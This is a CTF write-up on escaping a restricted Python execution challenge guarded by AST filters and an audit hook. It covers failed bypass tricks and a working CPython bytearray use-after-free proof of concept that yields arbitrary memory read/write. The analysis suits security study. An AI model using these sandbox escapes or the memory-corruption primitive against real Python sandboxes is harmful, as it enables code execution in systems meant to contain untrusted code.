---
layout: post
title: "[DiceCTF 2024] IRS/diligent-auditor"
author: lydxn
---

This writeup is co-authored with [desp](../../authors/Desp).

# IRS [481]

## Challenge

 - Author: kmh
 - Solves: 2
 
> *The Internal Restrictedpythonexecution Service has established a new automated auditing pipeline. Can you
> remain undetected?*
>
> `nc mc.ax 31337`

Attachments:
[`irs.c`](https://static.dicega.ng/uploads/d08414a0010847008faece0bc12ec4a746693303c1bffc28960fcbbc96a01d64/irs.c)
[`irs`](https://static.dicega.ng/uploads/da7e724dfc3d05e77cc3543ea18600c87a1d64ca13f68ad5b575614bf4453085/irs)
[`audit.py`](https://static.dicega.ng/uploads/934719eaa4b1598b0a43ebb5ac6ac4244ca6139b0fd5d46cc0f00bef939e8173/audit.py)
[`build.sh`](https://static.dicega.ng/uploads/07dd025e37fcb1a54c99bc7d5d266216b33244737b147e108497dea435095029/build.sh)
[`run.sh`](https://static.dicega.ng/uploads/94c2bf49a136d49ebef810c73dc638bc1f7c02ac3eea3ba2ea347917d6edda50/run.sh)
[`Dockerfile`](https://static.dicega.ng/uploads/e2f9c5fcdffc03011854d942e891b7a15e3216850713f2006cba442b8072badf/Dockerfile)

## Analysis

We're presented with the following `audit.py` file:

```py
import ast
import irs

dangerous = lambda s: any(d in s for d in ("__", "attr"))
dangerous_attr = lambda s: dangerous(s) or s in dir(dict)
dangerous_nodes = (ast.Starred, ast.GeneratorExp, ast.Match, ast.With, ast.AsyncWith, ast.keyword, ast.AugAssign)

print("Welcome to the IRS! Enter your code:")
c = ""
while l := input("> "): c += l + "\n"
root = ast.parse(c)
for node in ast.walk(root):
    for child in ast.iter_child_nodes(node):
        child.parent = node
if not any(type(n) in dangerous_nodes or
           type(n) is ast.Name and dangerous(n.id) or
           type(n) is ast.Attribute and dangerous_attr(n.attr) or
           type(n) is ast.Subscript and type(n.parent) is not ast.Delete or
           type(n) is ast.arguments and (n.kwarg or n.vararg)
           for n in ast.walk(root)):
    del __builtins__.__loader__
    del __builtins__.__import__
    del __builtins__.__spec__
    irs.audit()
    exec(c, {}, {})
```

The server accepts a multi-line input through the variable `c`, and runs it through a series of checks to
make sure the code isn't **dangerous**. If all the checks pass, the input is executed as Python code via an
`exec`.

In such "pyjail" challenges, the flag is usually stored somewhere on the filesystem, meaning we will likely
need to obtain a shell or file read of some sort.

Analyzing the code further, we find that it uses the `ast` module to **ban** the following Python constructs:

 1. Names and attributes containing `__` or `attr`, meaning we can't use the `getattr()`
 and `setattr()` built-ins
 2. Attributes whose names are found in `dir(dict)`
 3. `*args` and `**kwargs` in function parameters
 4. Starred expressions - `ast.Starred`, and keyword arguments - `ast.keyword`
 5. Subscript notation - `ast.Subscript`, with the exception of `del a[b]`
 6. Generator expressions - `ast.GeneratorExp`
 7. Match statements - `ast.Match`
 8. With statements - `ast.With/ast.AsyncWith`
 9. Augmented assignment - `ast.AugAssign`

In addition, the built-ins `__loader__`, `__import__` and `__spec__` are deleted prior to executing the program.

The last thing it does is run the C extension, `irs.audit()`. From the `irs.c` attachment given, we see that
it adds an **audit hook** which causes the program to terminate upon triggering an
[audit event](https://docs.python.org/3/library/audit_events.html):

```c
static int audit(const char *event, PyObject *args, void *userData) {
    static int running = 0;
    if (running) {
        exit(0);
    }
    if (!running && !strcmp(event, "exec")) running = 1;
    return 0;
}

static PyObject* irs_audit(PyObject *self, PyObject *args) {
    PySys_AddAuditHook(audit, NULL);
    Py_RETURN_NONE;
}
```

For some background, audit hooks were first introduced in Python 3.8 to, as quoted by [PEP 578](https://peps.python.org/pep-0578/),
*"make actions taken by the Python runtime visible to auditing tools."* It's intended to be used for logging
applications, but as seen here, it also works as a sandboxing technique (although this is highly
[discouraged](https://peps.python.org/pep-0578/#why-not-a-sandbox)).

## Getting past the audit hook

The first thing we learned is that audit hooks are *not a joke*. As in, they are a lot harder to bypass than
one might suspect. There are some useful built-ins for jailbreaking, like `breakpoint()`, `open()` and `exec()`, but the audit blocks them all. It also blocks many standard library functions - especially shell functions
like `os.system`.

There do exist some potentially dangerous library functions that the audit hook *does not* detect (such as
`ctypes`), but in fact, `import`s are audited too! Only modules that have not been loaded at runtime
(a.k.a. those in `sys.modules`) do not trigger the audit event. We can import stuff like `os` and `sys`, but
anything useful to get us an RCE is annoyingly out of reach.

Because of this, we initially considered the idea of constructing a custom code object and possibly
[pwning](https://doar-e.github.io/blog/2014/04/17/deep-dive-into-pythons-vm-story-of-load_const-bug/) the
process that way, but were immediately disappointed to discover that `code.__new__` was banned too.

Despite its unintended usage, audit hooks were surprisingly effective here! Just getting past the audit hook
was a challenge in and of itself.

## Reading dict() items

Since it seems pretty challenging, let's just deal with the audit hook later. If we can at least gain access
the other loaded modules, that should widen the playing field of available functions to exploit.

The `__` restriction doesn't leave us with many options in this regard. The classic `object.__subclasses__()`
trick is out, and so are plenty of the other useful dunder attributes. `getattr()` lets us read the attribute
dynamically, but we're not allowed to use a name containing `attr`.

Hmmm, well the built-in *itself* isn't banned, so what if we just did `globals()['__builtins__']['getattr']`?

This bypasses both the `attr` and `__` checks, but we're also not allowed to use subscripts. Furthermore, any
attribute whose name coincides with `dir(dict)` is blocked, so we can't even use `.get()` or `.pop()` to get
around that.

To our knowledge (and somewhat surprisingly!), there was no other way to obtain a dict entry. And banning
`ast.keyword` meant we couldn't do anything tricky like unpacking the dict as a keyword argument:

```py
def f(attr=0, **kwargs):  # No ast.arguments either :(
    print(attr)
f(**globals())            # No ast.keyword
```

## More futile attempts

Since the `dict()` path led us down a dead end, another idea we had was to abuse the properties of **generator
frames**. Once we had a frame object, we could then use `.f_back` to trace it back all the way to the global scope. With some trickery with yield functions to
bypass the `ast.GeneratorExp` condition, this seemed promising:

```py
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame)
```

However, when we ran the script, nothing printed out. After some confusion, we realized that the audit
hook probably also banned generator frames! (yep, they
[did](https://github.com/python/cpython/pull/24182)).

And well, even if they didn't, the only useful attributes we can extract from the frame object are `f_code`
(which is useless because code objects are banned), `f_builtins` (which returns a dict that we can't access
anyway), and `f_globals` (useless for the same reason as `f_builtins`).

Now, perhaps we could get some information from understanding why certain things were banned. The suspicious
one was definitely the fact that `del a[b]` was allowed - the only case where we could use subscripts.
However, we couldn't find a use for it given that we can't actually read the value that's being deleted.

Another banned item was `ast.Match`. This time, we knew that it was because structural pattern matching
could be abused to work as a `getattr()`:

```py
match object:
    case type(__subclasses__=subclasses):
        print(subclasses())
```

It would've been cool if the solution was based off this trick, but alas, the author was one step ahead of us.

Python also has a format string vulnerability in which attributes can be accessed by executing a format string:

```py
subclasses = '{0.__subclasses__}'.format(object)
```

But because it returns the attribute as a **string** rather than the object itself though, this approach also
did not appear very promising.

## Entering the dark side

At this point, we were getting *desp*erate. So we, yes, resorted to our option left:
**memory corruption**.

One bug in particular, [Issue #91153](https://github.com/python/cpython/issues/91153), was a Use-After-Free
in `bytearray.__index__`. The interesting thing about this issue is that it was closed with a fix in 2022,
but it still in fact works on the latest version! We can try out the PoC:

```py
# uaf.py

class B:
    def __index__(self):
        global memory
        uaf.clear()
        memory = bytearray()
        uaf.extend([0] * 56)
        return 1

uaf = bytearray(56)
uaf[23] = B()
memory[id(250) + 24] = 100
print(250)
```
---
```sh
$ python3.12 uaf.py
100
```

The expected output is clearly `250`, but it outputs `100` instead!

## UAF exploit

It's not immediately clear where the bug is, but we can make some reasonable assumptions from looking at the
code. First, the `__index__` method behaves a bit like a cast to an integer, meaning it coerces `B()` to a
numeric value under certain circumstances (like assigning to a bytearray).

Therefore, the line that sets `uaf[23] = B()` actually means `uaf[23] = 1`, only the coercion is done *during*
the assignment. This implies that something is happening between the time `uaf[23]` is assigned and the
suspicious `.clear()`/`.extend()` code is executed, confusing the interpreter somehow.

For a better understanding of how the bug works, we must dig into the CPython source code:

```c
/* Objects/bytearrayobject.c */

static int
bytearray_ass_subscript(PyByteArrayObject *self, PyObject *index, PyObject *values)
{
    Py_ssize_t start, stop, step, slicelen, needed;
    char *buf, *bytes;
    buf = PyByteArray_AS_STRING(self);

    if (_PyIndex_Check(index)) {
        Py_ssize_t i = PyNumber_AsSsize_t(index, PyExc_IndexError);

        if (i == -1 && PyErr_Occurred()) {
            return -1;
        }

        int ival = -1;

        // GH-91153: We need to do this *before* the size check, in case values
        // has a nasty __index__ method that changes the size of the bytearray:
        if (values && !_getbytevalue(values, &ival)) {
            return -1;
        }

        if (i < 0) {
            i += PyByteArray_GET_SIZE(self);
        }

        if (i < 0 || i >= Py_SIZE(self)) {
            PyErr_SetString(PyExc_IndexError, "bytearray index out of range");
            return -1;
        }

        if (values == NULL) {
            /* Fall through to slice assignment */
            start = i;
            stop = i + 1;
            step = 1;
            slicelen = 1;
        }
        else {
            assert(0 <= ival && ival < 256);
            buf[i] = (char)ival;
            return 0;
        }
    }
    ...
}
```

Let's construct an execution timeline of what happens from start to end of the Python program (explanation by
[@nneonneo](../../../authors/Nneonneo)):

 1. `uaf` is allocated as a bytearray with a 56-byte backing buffer.
 2. `uaf[23] = B()` calls `bytearray_ass_subscript(uaf, 23, B())`.
 3. `buf = PyByteArray_AS_STRING(self);` caches `buf` to point to the backing buffer.
 4. `_getbytevalue` is called to turn `B()` into a byte, which invokes `B.__index__`.
 5. `B.__index__` clears `uaf`, which frees its backing buffer.
 6. `B.__index__` constructs a new bytearray called `memory`, which exactly occupies the memory of the freed
 backing buffer (still cached in `buf`).
 7. `B.__index__` extends `uaf` by 56 bytes so the size appears unchanged.
 8. `buf[i] = (char)ival;` assigns 1 (`B()`'s return value) to index 23 of the freed buffer, overwriting
 `memory`'s size field, `ob_size`.
 9. `memory` now has a NULL backing buffer (no buffer is initially allocated for an empty bytearray) with an
 absurd size field.

Thus, `memory` effectively becomes a buffer that stretches the entirety of virtual memory, allowing us to
read/write to any arbitrary address.

`uaf[id(250) + 24] = 100` simply makes use of the fact that small integers are cached in a `small_ints[]`
array in memory, and reassigning offset 24 overwrites the value field of `250` to equal `100`.

The code also includes a `// GH-91153:` comment of the bug fix. If we read it carefully, we realize that it
does nothing to prevent this exploit from working, except forcing Step 7) so as to trick Python into
thinking the bytearray hadn't changed size.

This bug can easily be fixed by not caching `buf`.
